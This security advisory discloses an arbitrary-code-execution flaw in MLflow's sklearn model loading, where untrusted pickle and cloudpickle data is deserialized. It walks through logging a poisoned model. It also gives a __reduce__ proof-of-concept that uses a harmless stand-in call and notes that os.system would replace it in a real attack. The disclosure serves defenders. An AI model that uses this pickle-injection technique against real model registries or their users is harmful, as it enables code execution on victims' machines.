SAI Security Advisory

Cloudpickle and Pickle Load on Sklearn Model Load Leading to Code Execution

June 4, 2024

Products Impacted

This vulnerability was introduced in version 1.1.0 of MLflow.

CVSS Score: 8.8

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

The vulnerability exists within MLflow's sklearn/__init__.py file, in the _load_model_from_local_file function, which is invoked whenever mlflow.sklearn.load_model is called.

def _load_model_from_local_file(path, serialization_format):
    ...
    with open(path, "rb") as f:
        if serialization_format == SERIALIZATION_FORMAT_PICKLE:
            return pickle.load(f)
        elif serialization_format == SERIALIZATION_FORMAT_CLOUDPICKLE:
            import cloudpickle
            return cloudpickle.load(f)

An attacker can exploit this by injecting into a model a pickle object that executes arbitrary code when deserialized. The attacker then calls mlflow.sklearn.log_model() to serialize the model and log it to the tracking server. By default, cloudpickle.load is used to deserialize the model when it is loaded; alternatively, setting the serialization format to 'pickle' when the model is logged forces the use of pickle.load() instead. In the example below, the pickle object has been injected into the __init__ method of the ElasticNet class.

with mlflow.start_run():
    lr = ElasticNet(alpha=alpha, l1_ratio=l1_ratio, random_state=42)
    lr.fit(train_x, train_y)

    ...

    # Either upload the model, which will use the default format of cloudpickle
    mlflow.sklearn.log_model(
        lr, artifact_path="model", registered_model_name="SklearnPickleDefault"
    )

    # Or upload the model with the serialization format set to pickle
    mlflow.sklearn.log_model(
        lr,
        artifact_path="model",
        registered_model_name="SklearnPickleDefault",
        serialization_format="pickle",
    )
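The injection itself typically abuses pickle's __reduce__ hook, which tells pickle to invoke an arbitrary callable during deserialization. The following minimal, self-contained sketch illustrates the mechanism; the MaliciousPayload class name is hypothetical, and the benign str.upper call stands in for what would be os.system or similar in a real exploit:

```python
import pickle


class MaliciousPayload:
    """Illustrative stand-in for the object an attacker embeds in a logged model."""

    def __reduce__(self):
        # pickle calls the returned callable with these arguments during
        # deserialization; a real attacker would return os.system or similar.
        return (str.upper, ("arbitrary code ran on load",))


# Serializing and then deserializing the object triggers the callable.
data = pickle.dumps(MaliciousPayload())
result = pickle.loads(data)
print(result)  # ARBITRARY CODE RAN ON LOAD
```

Because cloudpickle uses the same underlying protocol, the same payload fires regardless of which of the two serialization formats the attacker selects when logging the model.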

When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:

import mlflow
...
logged_model = "models:/SklearnPickleDefault/1"
loaded_model = mlflow.sklearn.load_model(logged_model, dst_path='/tmp/sklearn_model')
